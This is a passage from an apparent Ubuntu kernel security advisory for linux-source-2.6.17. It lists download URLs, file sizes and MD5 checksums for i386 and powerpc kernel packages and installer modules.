http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/floppy-modules-2.6.17-12-generic-di_2.6.17.1-12.39_i386.udeb\n      Size/MD5:    34712 e7634d20ac3160d0571c2488e9ecd96f\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/ide-modules-2.6.17-12-386-di_2.6.17.1-12.39_i386.udeb\n      Size/MD5:   140556 2a6634cb2d87c0cce91f516441361147\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/ide-modules-2.6.17-12-generic-di_2.6.17.1-12.39_i386.udeb\n      Size/MD5:   143830 4cb625ed09c696bbbd7e4c8ab3e1a0de\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/input-modules-2.6.17-12-386-di_2.6.17.1-12.39_i386.udeb\n      Size/MD5:    51758 fc9f6eaf17a82cb10fef0e946e5e8c69\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/input-modules-2.6.17-12-generic-di_2.6.17.1-12.39_i386.udeb\n      Size/MD5:    53182 68791aae59f996a1b63d370455564243\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/ipv6-modules-2.6.17-12-386-di_2.6.17.1-12.39_i386.udeb\n      Size/MD5:   131598 c83d5b2c8672d64225664c0dfa59bf05\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/ipv6-modules-2.6.17-12-generic-di_2.6.17.1-12.39_i386.udeb\n      Size/MD5:   139174 7e4ca011696d4606795423eaef77a801\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/irda-modules-2.6.17-12-386-di_2.6.17.1-12.39_i386.udeb\n      Size/MD5:   288316 5ad389052046deb622f8a4ecc06acc1e\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/irda-modules-2.6.17-12-generic-di_2.6.17.1-12.39_i386.udeb\n      Size/MD5:   290684 7a44cec77a36726791bd95cc9c3d61da\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/jfs-modules-2.6.17-12-386-di_2.6.17.1-12.39_i386.udeb\n      Size/MD5:   103540 84f9dd4e0da64b60d505ff32213de564\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/jfs-modules-2.6.17-12-generic-di_2.6.17.1-12.39_i386.udeb\n      Size/MD5:   106734 30e33868fef929c1ae9ada34a904612a\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/kernel-image-2.6.17-12-386-di_2.6.17.1-12.39_i386.udeb\n      Size/MD5:  1737886 bb16ec7525631c14034ab29a062ef924\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/kernel-image-2.6.17-12-generic-di_2.6.17.1-12.39_i386.udeb\n      Size/MD5:  1803410 fa07a7b1af1f688576600e39a77d118b\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/linux-headers-2.6.17-12-386_2.6.17.1-12.39_i386.deb\n      Size/MD5:   912538 58e42b87cdb686e3b1a001a5c9d00266\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/linux-headers-2.6.17-12-generic_2.6.17.1-12.39_i386.deb\n      Size/MD5:   917330 2a79321df3ffa0421730b1d13fdcb2e0\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/linux-headers-2.6.17-12-server-bigiron_2.6.17.1-12.39_i386.deb\n      Size/MD5:   921050 cd0b834735573718dc588e33771fc69e\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/linux-headers-2.6.17-12-server_2.6.17.1-12.39_i386.deb\n      Size/MD5:   917220 00bf54643d92b3126916e1389b62b9a8\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/linux-headers-2.6.17-12_2.6.17.1-12.39_i386.deb\n      Size/MD5:  7424710 152c4c37eeea537c091d3fbaa6ff1a19\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/linux-image-2.6.17-12-386_2.6.17.1-12.39_i386.deb\n      Size/MD5: 22850908 896bff490260d2a0a2d1c63587573776\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/linux-image-2.6.17-12-generic_2.6.17.1-12.39_i386.deb\n      Size/MD5: 22987088 7532ee46289f43572de6af13d76c8122\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/linux-image-2.6.17-12-server-bigiron_2.6.17.1-12.39_i386.deb\n      Size/MD5: 23794716 399fc0c6f4d45108ad848dee3aeb8526\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/linux-image-2.6.17-12-server_2.6.17.1-12.39_i386.deb\n      Size/MD5: 23294984 54c7e00442278882a2b5a27a9fc8a4e1\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/linux-image-debug-2.6.17-12-386_2.6.17.1-12.39_i386.deb\n      Size/MD5:  1961664 54e96b54c3d01492e0defd53212da69c\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/linux-image-debug-2.6.17-12-generic_2.6.17.1-12.39_i386.deb\n      Size/MD5:  2029428 dc8fd23f7eacf60b79458d980c0be8ce\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/linux-image-debug-2.6.17-12-server-bigiron_2.6.17.1-12.39_i386.deb\n      Size/MD5:  2067220 8d62edb94a89bb94b9c3ae0c678afdfe\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/linux-image-debug-2.6.17-12-server_2.6.17.1-12.39_i386.deb\n      Size/MD5:  2029160 deca25a0d751c2907ec756efed4e818f\n    http://security.ubuntu.com/ubuntu/pool/universe/l/linux-source-2.6.17/linux-image-kdump_2.6.17.1-12.39_i386.deb\n      Size/MD5: 21530894 3b57d3f94af90d5f1c1a3cc26910922b\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/linux-libc-dev_2.6.17.1-12.39_i386.deb\n      Size/MD5:  1771222 71c763e96fa18da947dc6eee6273f996\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/loop-modules-2.6.17-12-386-di_2.6.17.1-12.39_i386.udeb\n      Size/MD5:    15370 10cfc18907f69359d1bdbf2f78d26d08\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/loop-modules-2.6.17-12-generic-di_2.6.17.1-12.39_i386.udeb\n      Size/MD5:    15736 35362bfbf692db23fa6ce4701fec17f0\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/md-modules-2.6.17-12-386-di_2.6.17.1-12.39_i386.udeb\n      Size/MD5:   253308 26b726d039e835abbd7b1b7f2505b15b\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/md-modules-2.6.17-12-generic-di_2.6.17.1-12.39_i386.udeb\n      Size/MD5:   263850 5dab11c3c728f078b7af1a07db1bee55\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/nfs-modules-2.6.17-12-386-di_2.6.17.1-12.39_i386.udeb\n      Size/MD5:   220370 f17526b4a1d385552171a60962087c12\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/nfs-modules-2.6.17-12-generic-di_2.6.17.1-12.39_i386.udeb\n      Size/MD5:   227608 d7e47e9512916d938c43e591b43b0ace\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/nic-firmware-2.6.17-12-386-di_2.6.17.1-12.39_i386.udeb\n      Size/MD5:  1048352 6c6c9c78e73ec9f7971fe63cf49b8c16\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/nic-firmware-2.6.17-12-generic-di_2.6.17.1-12.39_i386.udeb\n      Size/MD5:  1048472 d07c2b1c54c9edac2e5a975832e1276b\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/nic-modules-2.6.17-12-386-di_2.6.17.1-12.39_i386.udeb\n      Size/MD5:  2092200 94b08a57d9befd744d4a7dd984c46832\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/nic-modules-2.6.17-12-generic-di_2.6.17.1-12.39_i386.udeb\n      Size/MD5:  2142860 1823a89cdaa80f133c3042ef6027906d\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/nic-pcmcia-modules-2.6.17-12-386-di_2.6.17.1-12.39_i386.udeb\n      Size/MD5:   156874 8252c3c9f39252cee290205f86f3eac5\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/nic-pcmcia-modules-2.6.17-12-generic-di_2.6.17.1-12.39_i386.udeb\n      Size/MD5:   152152 3445e3338b9c17bcb43bb4a910f56948\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/nic-shared-modules-2.6.17-12-386-di_2.6.17.1-12.39_i386.udeb\n      Size/MD5:     9180 b266fb5d5b4f747c79c34543d2edcbde\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/nic-shared-modules-2.6.17-12-generic-di_2.6.17.1-12.39_i386.udeb\n      Size/MD5:     9658 e855025e195c2f8f173fae055a249a3f\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/nic-usb-modules-2.6.17-12-386-di_2.6.17.1-12.39_i386.udeb\n      Size/MD5:    79224 b9faa2fe32fb6615b36cb5d771d195fb\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/nic-usb-modules-2.6.17-12-generic-di_2.6.17.1-12.39_i386.udeb\n      Size/MD5:    81764 22a1775183f30e2af51c6422d7b0ffd7\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/ntfs-modules-2.6.17-12-386-di_2.6.17.1-12.39_i386.udeb\n      Size/MD5:    55084 f8b386e3cf4128da93fdc168172b931d\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/ntfs-modules-2.6.17-12-generic-di_2.6.17.1-12.39_i386.udeb\n      Size/MD5:    56734 4642732b2d53ec2974622eab1be5b036\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/parport-modules-2.6.17-12-386-di_2.6.17.1-12.39_i386.udeb\n      Size/MD5:    34484 ae3b8321a6c2e72ce1d73aaeb51a290b\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/parport-modules-2.6.17-12-generic-di_2.6.17.1-12.39_i386.udeb\n      Size/MD5:    35412 5a130ce6dd2a832191ecb3c06a936fda\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/pcmcia-modules-2.6.17-12-386-di_2.6.17.1-12.39_i386.udeb\n      Size/MD5:    85866 9a4364e45eb252c42c8467b5aac3238f\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/pcmcia-modules-2.6.17-12-generic-di_2.6.17.1-12.39_i386.udeb\n      Size/MD5:    87432 b52be9db245f990905b0d9ebc6dd57c7\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/pcmcia-storage-modules-2.6.17-12-386-di_2.6.17.1-12.39_i386.udeb\n      Size/MD5:     6084 dcf193961a372c692a2eae91b3f632f9\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/pcmcia-storage-modules-2.6.17-12-generic-di_2.6.17.1-12.39_i386.udeb\n      Size/MD5:     6096 99a48360f55afe690f9473e34b6f1799\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/plip-modules-2.6.17-12-386-di_2.6.17.1-12.39_i386.udeb\n      Size/MD5:     8608 9ec3749db2fb4fe85b772cb565ad04ee\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/plip-modules-2.6.17-12-generic-di_2.6.17.1-12.39_i386.udeb\n      Size/MD5:     8902 5cf288f11f076cf4493acb3462185a19\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/ppp-modules-2.6.17-12-386-di_2.6.17.1-12.39_i386.udeb\n      Size/MD5:    52684 b9d4b121f3ae3f4e9a59e8ef6db2cdb6\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/ppp-modules-2.6.17-12-generic-di_2.6.17.1-12.39_i386.udeb\n      Size/MD5:    55112 72dba23de6f18debf662694afd1c86ca\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/reiserfs-modules-2.6.17-12-386-di_2.6.17.1-12.39_i386.udeb\n      Size/MD5:   129982 3cf698040f21e94ef38da5245d398564\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/reiserfs-modules-2.6.17-12-generic-di_2.6.17.1-12.39_i386.udeb\n      Size/MD5:   132968 6da10555d56c7a4e80b59b90af9829ee\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/sata-modules-2.6.17-12-386-di_2.6.17.1-12.39_i386.udeb\n      Size/MD5:    99866 7f593b5372383a266557d38d6ef879d8\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/sata-modules-2.6.17-12-generic-di_2.6.17.1-12.39_i386.udeb\n      Size/MD5:   101174 3b572152c1463d1515c31a73f990d2a3\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/scsi-core-modules-2.6.17-12-386-di_2.6.17.1-12.39_i386.udeb\n      Size/MD5:    79568 d5b9488f8e66089a93368f970d7c9aea\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/scsi-core-modules-2.6.17-12-generic-di_2.6.17.1-12.39_i386.udeb\n      Size/MD5:    80934 ba31c0d5c7ee98e076e9e3044dd8dac3\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/scsi-modules-2.6.17-12-386-di_2.6.17.1-12.39_i386.udeb\n      Size/MD5:  1394930 8f0491b599a89d26ae8fdda93cf47535\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/scsi-modules-2.6.17-12-generic-di_2.6.17.1-12.39_i386.udeb\n      Size/MD5:  1398114 9f7edf4e56a5a5363458792fbe1832e2\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/serial-modules-2.6.17-12-386-di_2.6.17.1-12.39_i386.udeb\n      Size/MD5:    69148 7be68924e4c4e55ffc329ba1b30e7482\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/serial-modules-2.6.17-12-generic-di_2.6.17.1-12.39_i386.udeb\n      Size/MD5:    71082 3e9618027770b0bcc5ad955e3809081c\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/socket-modules-2.6.17-12-386-di_2.6.17.1-12.39_i386.udeb\n      Size/MD5:    11422 450542ce7fbcd5144c8ee376fc9d38ec\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/socket-modules-2.6.17-12-generic-di_2.6.17.1-12.39_i386.udeb\n      Size/MD5:    11980 f2779c8454730ccb72358ccca660e0d6\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/speakup-modules-2.6.17-12-386-di_2.6.17.1-12.39_i386.udeb\n      Size/MD5:    62478 51c02138465bcc89c68c9701b275c5dd\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/speakup-modules-2.6.17-12-generic-di_2.6.17.1-12.39_i386.udeb\n      Size/MD5:    63808 eeaf8f81dfe946df62111a7ea8cbdc9e\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/ufs-modules-2.6.17-12-386-di_2.6.17.1-12.39_i386.udeb\n      Size/MD5:    36008 ef4b454375feece71b44259e2a20d752\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/ufs-modules-2.6.17-12-generic-di_2.6.17.1-12.39_i386.udeb\n      Size/MD5:    36522 194f8344fe8660a789069cfbb99b4369\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/usb-modules-2.6.17-12-386-di_2.6.17.1-12.39_i386.udeb\n      Size/MD5:   127288 4eb7f58f56d296423a57d6f7a562bf96\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/usb-modules-2.6.17-12-generic-di_2.6.17.1-12.39_i386.udeb\n      Size/MD5:   131320 cca3b2c3fcb5bc7f991af37e1a7f7a1d\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/usb-storage-modules-2.6.17-12-386-di_2.6.17.1-12.39_i386.udeb\n      Size/MD5:    46806 9f859879ca4e693a42f4da083661ba0c\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/usb-storage-modules-2.6.17-12-generic-di_2.6.17.1-12.39_i386.udeb\n      Size/MD5:    47566 6fc3e9a1e7766bbca3bc5489258d56e4\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/xfs-modules-2.6.17-12-386-di_2.6.17.1-12.39_i386.udeb\n      Size/MD5:   311902 3f6da4553365c0d510f4556510396b72\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/xfs-modules-2.6.17-12-generic-di_2.6.17.1-12.39_i386.udeb\n      Size/MD5:   318658 d5c418b0d20538a0cd7aafb8ec1aa0b2\n\n  powerpc architecture (Apple Macintosh G3/G4/G5)\n\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/affs-modules-2.6.17-12-powerpc-di_2.6.17.1-12.39_powerpc.udeb\n      Size/MD5:    23240 66f5bf514de994d84915d882d5a611f8\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/affs-modules-2.6.17-12-powerpc64-smp-di_2.6.17.1-12.39_powerpc.udeb\n      Size/MD5:    26082 6be2f4d3f90adba4e6d98973677b2190\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/cdrom-core-modules-2.6.17-12-powerpc-di_2.6.17.1-12.39_powerpc.udeb\n      Size/MD5:    48586 53fd8c1845bfdcbb7e5e29b107a276c0\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/cdrom-core-modules-2.6.17-12-powerpc64-smp-di_2.6.17.1-12.39_powerpc.udeb\n      Size/MD5:    52034 603d87b3bbd90eba2f634ab2a9618972\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/crc-modules-2.6.17-12-powerpc-di_2.6.17.1-12.39_powerpc.udeb\n      Size/MD5:     2320 e219fa60c226159fc90d6df2804347f4\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/crc-modules-2.6.17-12-powerpc64-smp-di_2.6.17.1-12.39_powerpc.udeb\n      Size/MD5:     2514 e1a6b95c138f84b6a50230c459e371eb\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/ext2-modules-2.6.17-12-powerpc-di_2.6.17.1-12.39_powerpc.udeb\n      Size/MD5:    39142 8a31b03d64d142dc174f29ddfd6469e8\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/ext2-modules-2.6.17-12-powerpc64-smp-di_2.6.17.1-12.39_powerpc.udeb\n      Size/MD5:    43164 c6812e8fc74cc275abbf1ad8923cd95f\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/ext3-modules-2.6.17-12-powerpc-di_2.6.17.1-12.39_powerpc.udeb\n      Size/MD5:   111464 7687c500326dd4c20331762277160582\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/ext3-modules-2.6.17-12-powerpc64-smp-di_2.6.17.1-12.39_powerpc.udeb\n      Size/MD5:   122272 b554f0b20dcd0ebfce5ca985dd15a52e\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/fat-modules-2.6.17-12-powerpc-di_2.6.17.1-12.39_powerpc.udeb\n      Size/MD5:    40406 f65f76d5ff504a1e7126489858150a81\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/fat-modules-2.6.17-12-powerpc64-smp-di_2.6.17.1-12.39_powerpc.udeb\n      Size/MD5:    46878 9c14a66ff520fb173f2ec3541627f65b\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/fb-modules-2.6.17-12-powerpc-di_2.6.17.1-12.39_powerpc.udeb\n      Size/MD5:    28064 8c8f4414d68106d96c0cb147375beac4\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/fb-modules-2.6.17-12-powerpc64-smp-di_2.6.17.1-12.39_powerpc.udeb\n      Size/MD5:    29046 7528aa197e90533bc51c5a2faac3188d\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/firewire-core-modules-2.6.17-12-powerpc-di_2.6.17.1-12.39_powerpc.udeb\n      Size/MD5:   209724 a8697532cb81b2eb1601bcb57f398109\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/firewire-core-modules-2.6.17-12-powerpc64-smp-di_2.6.17.1-12.39_powerpc.udeb\n      Size/MD5:   225682 0d1c7a72f611eec4e336faac7dd9893d\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/floppy-modules-2.6.17-12-powerpc-di_2.6.17.1-12.39_powerpc.udeb\n      Size/MD5:    44588 8ee2bf4db312823e9e19fc0701170839\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/floppy-modules-2.6.17-12-powerpc64-smp-di_2.6.17.1-12.39_powerpc.udeb\n      Size/MD5:    40180 af520f3f82ae6373ecf050f6a0515bc6\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/fs-common-modules-2.6.17-12-powerpc-di_2.6.17.1-12.39_powerpc.udeb\n      Size/MD5:     1960 430d783ddeaa411aa03723cb931f03a0\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/fs-common-modules-2.6.17-12-powerpc64-smp-di_2.6.17.1-12.39_powerpc.udeb\n      Size/MD5:     2232 a4ada90e401800c697cc60b0e396e932\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/hfs-modules-2.6.17-12-powerpc-di_2.6.17.1-12.39_powerpc.udeb\n      Size/MD5:    79296 02e167b7c3776269d66103ca8e2d62d6\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/hfs-modules-2.6.17-12-powerpc64-smp-di_2.6.17.1-12.39_powerpc.udeb\n      Size/MD5:    86612 82fb17eba860416a510aa5d7b050c784\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/ide-modules-2.6.17-12-powerpc-di_2.6.17.1-12.39_powerpc.udeb\n      Size/MD5:   110262 c7dc1577ba7760981d7db9598a40137d\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/ide-modules-2.6.17-12-powerpc64-smp-di_2.6.17.1-12.39_powerpc.udeb\n      Size/MD5:   127800 53fbdb953cb85dede0a7e264330927cc\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/input-modules-2.6.17-12-powerpc-di_2.6.17.1-12.39_powerpc.udeb\n      Size/MD5:    55672 be221f80a184537ce3a0f2fa02b6824a\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/input-modules-2.6.17-12-powerpc64-smp-di_2.6.17.1-12.39_powerpc.udeb\n      Size/MD5:    61924 0ea661a0734d702381f0903e4296c237\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/ipv6-modules-2.6.17-12-powerpc-di_2.6.17.1-12.39_powerpc.udeb\n      Size/MD5:   141124 47ad113d4a43d19a08b81576ad604089\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/ipv6-modules-2.6.17-12-powerpc64-smp-di_2.6.17.1-12.39_powerpc.udeb\n      Size/MD5:   158556 5202300b269311ce4714754eff59efad\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/irda-modules-2.6.17-12-powerpc-di_2.6.17.1-12.39_powerpc.udeb\n      Size/MD5:   314556 391adbaa26d02a6890c6b28aef0020fd\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/irda-modules-2.6.17-12-powerpc64-smp-di_2.6.17.1-12.39_powerpc.udeb\n      Size/MD5:   289916 4f5665cc6d901f0d2d7fd35f3db4e615\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/jfs-modules-2.6.17-12-powerpc-di_2.6.17.1-12.39_powerpc.udeb\n      Size/MD5:   113204 86bd467218a4316dde6d8e2960f4ca9d\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/jfs-modules-2.6.17-12-powerpc64-smp-di_2.6.17.1-12.39_powerpc.udeb\n      Size/MD5:   116436 2b0ea85fd8ec23b7d8a7b626e7347d27\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/kernel-image-2.6.17-12-powerpc-di_2.6.17.1-12.39_powerpc.udeb\n      Size/MD5:  2052172 da6d033827867bd628c714edff14a8b9\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/kernel-image-2.6.17-12-powerpc64-smp-di_2.6.17.1-12.39_powerpc.udeb\n      Size/MD5:  2771818 3c384239bea32e48f696d7d30f847746\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/linux-headers-2.6.17-12-powerpc-smp_2.6.17.1-12.39_powerpc.deb\n      Size/MD5:   915864 d03bcf64df6e31149bd4b019ed60deb2\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/linux-headers-2.6.17-12-powerpc64-smp_2.6.17.1-12.39_powerpc.deb\n      Size/MD5:   920336 2162b15d8aea5ee373c22c874a22526b\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/linux-headers-2.6.17-12-powerpc_2.6.17.1-12.39_powerpc.deb\n      Size/MD5:   917858 516bcad3769297d3eef7f6d607bf35a5\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/linux-headers-2.6.17-12_2.6.17.1-12.39_powerpc.deb\n      Size/MD5:  7445094 549c0326666219ba0086efade9610992\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/linux-image-2.6.17-12-powerpc-smp_2.6.17.1-12.39_powerpc.deb\n      Size/MD5: 22719040 66394a300073c7ba74ef5c80d8bb65d0\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/linux-image-2.6.17-12-powerpc64-smp_2.6.17.1-12.39_powerpc.deb\n      Size/MD5: 24606070 ec3fa905f30188ea9e833087c913f7af\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/linux-image-2.6.17-12-powerpc_2.6.17.1-12.39_powerpc.deb\n      Size/MD5: 22427416 80377ed086d753ab3c77f7a402fea432\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/linux-image-debug-2.6.17-12-powerpc-smp_2.6.17.1-12.39_powerpc.deb\n      Size/MD5:  2042736 accb89985e59b51a14a26a2bbf0c2beb\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/linux-image-debug-2.6.17-12-powerpc64-smp_2.6.17.1-12.39_powerpc.deb\n      Size/MD5:  2589636 3113e56b1500407f0395c4997cbb2fc0\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/linux-image-debug-2.6.17-12-powerpc_2.6.17.1-12.39_powerpc.deb\n      Size/MD5:  1969034 689cc515c3fe9b9dd65c6340fb7122ea\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/linux-libc-dev_2.6.17.1-12.39_powerpc.deb\n      Size/MD5:  1729872 c6ee6d64e4fcdc422c24a20f756140a5\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/loop-modules-2.6.17-12-powerpc-di_2.6.17.1-12.39_powerpc.udeb\n      Size/MD5:    17430 091a6b837b4f03a4e01d085d382aa5b0\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/loop-modules-2.6.17-12-powerpc64-smp-di_2.6.17.1-12.39_powerpc.udeb\n      Size/MD5:    17360 d81498196e5cc7ec40c6fcae5e0f8b57\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/md-modules-2.6.17-12-powerpc-di_2.6.17.1-12.39_powerpc.udeb\n      Size/MD5:   258062 7cdc8ec029091506a1b39475c252e4dc\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/md-modules-2.6.17-12-powerpc64-smp-di_2.6.17.1-12.39_powerpc.udeb\n      Size/MD5:   297904 bbb079ce725c0f5b5db736c2e034ac9a\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/nfs-modules-2.6.17-12-powerpc-di_2.6.17.1-12.39_powerpc.udeb\n      Size/MD5:   239038 6144f028649a23faf13a4b4611c811e9\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/nfs-modules-2.6.17-12-powerpc64-smp-di_2.6.17.1-12.39_powerpc.udeb\n      Size/MD5:   266536 19c8662f8f7ee669e3f618cbc68b4fd5\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/nic-firmware-2.6.17-12-powerpc-di_2.6.17.1-12.39_powerpc.udeb\n      Size/MD5:  1048448 2d219f4cc488a3a5de3534fcc003b4c3\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/nic-firmware-2.6.17-12-powerpc64-smp-di_2.6.17.1-12.39_powerpc.udeb\n      Size/MD5:  1048588 65293d6fcac990bda20e84635efa96aa\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/nic-modules-2.6.17-12-powerpc-di_2.6.17.1-12.39_powerpc.udeb\n      Size/MD5:  2098394 